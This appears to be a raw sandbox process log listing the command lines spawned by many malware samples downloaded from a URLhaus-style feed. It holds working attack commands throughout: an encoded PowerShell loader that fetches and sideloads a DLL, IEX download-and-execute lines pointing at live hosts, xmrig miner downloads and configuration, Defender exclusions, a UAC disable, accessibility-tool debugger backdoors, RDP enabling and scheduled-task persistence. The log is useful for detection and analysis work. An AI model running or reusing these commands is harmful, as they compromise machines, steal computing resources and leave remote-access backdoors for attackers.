"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2076,i,279860771126058366,1926211084509464261,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2112 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2008,1793462190773208556,2027658628336550006,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2020 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2008,1793462190773208556,2027658628336550006,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2008,1793462190773208556,2027658628336550006,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2580 /prefetch:8

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,1793462190773208556,2027658628336550006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,1793462190773208556,2027658628336550006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,1793462190773208556,2027658628336550006,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\Downloads\UrlHausFiles\new.exe

"C:\Users\Admin\Downloads\UrlHausFiles\new.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3032,i,279860771126058366,1926211084509464261,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3052 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3060,i,279860771126058366,1926211084509464261,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3188 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4240,i,279860771126058366,1926211084509464261,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4264 /prefetch:2

C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe

"C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4608,i,279860771126058366,1926211084509464261,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4676 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe"

C:\Windows\System32\cmd.exe

cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"

C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4844,i,279860771126058366,1926211084509464261,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4636 /prefetch:8

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe" "SearchUII.exe" ENABLE

C:\Windows\SYSTEM32\cmd.exe

cmd

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\cmd.exe

"cmd" /c net use

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "new" /tr "C:\Users\Admin\AppData\Roaming\new.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"

C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"

C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat

"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"

C:\Windows\SysWOW64\net.exe

net use

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/xmrig.exe', 'C:\Users\Admin\c3pool\xmrig.exe')"

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe"

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe" -service -lunch

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff913ca3cb8,0x7ff913ca3cc8,0x7ff913ca3cd8

C:\Users\Admin\Downloads\UrlHausFiles\aaa.exe

"C:\Users\Admin\Downloads\UrlHausFiles\aaa.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im FLiNGTrainerUpdater.exe

C:\Users\Admin\Downloads\UrlHausFiles\jeditor.exe

"C:\Users\Admin\Downloads\UrlHausFiles\jeditor.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1340,9367747085218250185,4564943604888146312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1932 /prefetch:3

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

"C:\Users\Admin\Downloads\UrlHausFiles\file.exe"

C:\Windows\SYSTEM32\wscript.exe

"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im FLiNGTrainer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/nssm.exe', 'C:\Users\Admin\c3pool\nssm.exe')"

C:\Users\Admin\Downloads\UrlHausFiles\Update.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Update.exe"

C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe

"C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"

C:\Users\Admin\Downloads\UrlHausFiles\random.exe

"C:\Users\Admin\Downloads\UrlHausFiles\random.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\autoc3pool.bat" "

C:\Users\Admin\Downloads\UrlHausFiles\7z.exe

"C:\Users\Admin\Downloads\UrlHausFiles\7z.exe"

C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe

"C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe"

C:\Users\Admin\Downloads\UrlHausFiles\logon.exe

"C:\Users\Admin\Downloads\UrlHausFiles\logon.exe"

C:\Users\Admin\Downloads\UrlHausFiles\chromedump.exe

"C:\Users\Admin\Downloads\UrlHausFiles\chromedump.exe"

C:\Windows\system32\tasklist.exe

tasklist /fi "imagename eq xmrig.exe"

C:\Windows\system32\find.exe

find /i "xmrig.exe"

C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe

"C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe"

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe" -service -lunch

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\cmd.cmd" "

C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe

"C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe -Command "hostname | foreach { $_ -replace '[^a-zA-Z0-9]+', '_' }"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Users\Admin\Downloads\UrlHausFiles\N67fLgN.exe

"C:\Users\Admin\Downloads\UrlHausFiles\N67fLgN.exe"

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "hostname | foreach { $_ -replace '[^a-zA-Z0-9]+', '_' }"

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"

C:\Users\Admin\Downloads\UrlHausFiles\me.exe

"C:\Users\Admin\Downloads\UrlHausFiles\me.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys', '23472\WinRing0x64.sys')"

C:\Windows\system32\HOSTNAME.EXE

"C:\Windows\system32\HOSTNAME.EXE"

C:\Windows\SYSTEM32\rundll32.exe

rundll32.exe "C:\ProgramData\AMMYY\aa_nts.dll",run

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\Desktop\..\360Downloads\Pester.bat

C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe

"C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe"

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"url\": *\".*\",', '\"url\": \"auto.c3pool.org:80\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\SysWOW64\PING.EXE

ping -n 4 127.0.0.1

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"user\": *\".*\",', '\"user\": \"\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fAllowUnsolicited /t REG_DWORD /d "00000001"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/config.json', '23472\config.json')"

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v UserAuthentication /t REG_DWORD /d "00000000"

C:\Users\Admin\Downloads\UrlHausFiles\Video.scr

"C:\Users\Admin\Downloads\UrlHausFiles\Video.scr" /S

C:\Users\Admin\Downloads\UrlHausFiles\Video.scr

"C:\Users\Admin\Downloads\UrlHausFiles\Video.scr" /S

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /f /v SecurityLayer /t REG_DWORD /d "00000001"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c copy /y C:\Users\Admin\Downloads\UrlHausFiles\Video.scr C:\Users\Admin\HelpPane.exe

C:\Users\Admin\AppData\Local\Temp\5474.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\5474.tmp.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\HelpPane.exe --startup auto install

C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe

"C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe C:\Users\Admin\HelpPane.exe --startup auto install

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"pass\": *\".*\",', '\"pass\": \"Ozysbzxk\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5196 -ip 5196

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\HelpPane.exe start

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5196 -s 1088

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe C:\Users\Admin\HelpPane.exe start

C:\Users\Admin\Downloads\UrlHausFiles\adm_atu.exe

"C:\Users\Admin\Downloads\UrlHausFiles\adm_atu.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/xmrig.exe', '23472\xmrig.exe')"

C:\Users\Admin\Downloads\UrlHausFiles\Session.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Session.exe"

C:\Users\Admin\Downloads\UrlHausFiles\kg.exe

"C:\Users\Admin\Downloads\UrlHausFiles\kg.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"

C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"

C:\Users\Admin\Downloads\UrlHausFiles\meteran.exe

"C:\Users\Admin\Downloads\UrlHausFiles\meteran.exe"

C:\Users\Admin\Downloads\UrlHausFiles\test28.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test28.exe"

C:\Users\Admin\Downloads\UrlHausFiles\c1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\c1.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BAAAAKJKJEBG" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\c3pool\\xmrig.log\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/nssm.exe', '23472\nssm.exe')"

C:\Users\Admin\Downloads\UrlHausFiles\Guide2018.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Guide2018.exe"

C:\Users\Admin\Downloads\UrlHausFiles\qNVQKFyM.exe

"C:\Users\Admin\Downloads\UrlHausFiles\qNVQKFyM.exe"

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\UrlHausFiles\Deccastationers.msi"

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

"C:\Users\Admin\Downloads\UrlHausFiles\file.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'

C:\Users\Admin\Downloads\UrlHausFiles\Yellow%20Pages%20Scraper.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Yellow%20Pages%20Scraper.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')"

C:\Windows\system32\sc.exe

sc stop c3pool_miner

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\new.exe

C:\Users\Admin\AppData\Roaming\new.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')

C:\Windows\system32\sc.exe

sc delete c3pool_miner

